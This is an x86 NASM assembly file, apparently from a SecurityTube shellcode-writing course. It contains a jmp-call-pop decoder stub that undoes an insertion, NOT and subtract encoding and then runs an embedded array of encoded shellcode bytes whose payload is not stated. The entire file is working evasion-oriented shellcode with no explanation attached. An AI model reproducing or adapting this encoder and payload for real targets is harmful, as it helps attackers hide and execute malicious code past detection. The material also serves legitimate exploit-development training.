; Filename: insertion-decoder.nasm
; Author:  Vivek Ramachandran
; Website:  http://securitytube.net
; Training: http://securitytube-training.com 
;
;
; Purpose: 

global _start			

section .text
_start:

	jmp short call_shellcode

decoder:
	pop esi
	lea edi, [esi +1]
	xor eax, eax
	mov al, 1
	xor ebx, ebx

	sub byte [esi],1 ; -1 operation
	not byte [esi]   ; not operation in beginning
decode: 
	mov bl, byte [esi + eax]
	xor bl, 0xfe
	jz short EncodedShellcode
	mov bl, byte [esi + eax + 1]
	mov byte [edi], bl
	
	sub byte [edi],1 ; -1 operation
	not byte [edi]	 ; not operation	

	inc edi
	add al, 2
	jmp short decode	

call_shellcode:

	call decoder
	EncodedShellcode: db 0xcf,0x71,0x40,0xda,0xb0,0xa4,0x98,0xa9,0xd1,0x26,0xd1,0x77,0x8d,0x9c,0x98,0x8b,0x98,0xea,0xd1,0xc7,0x9e,0x58,0x97,0x93,0x92,0x75,0x77,0x7f,0x1d,0xe3,0xb0,0xd7,0x77,0x2e,0x1e,0x7a,0xad,0xbb,0x77,0x85,0x1f,0x43,0x50,0xd9,0xf5,0x62,0x33,0xdb,0x80,0x34,0xfe,0xfe
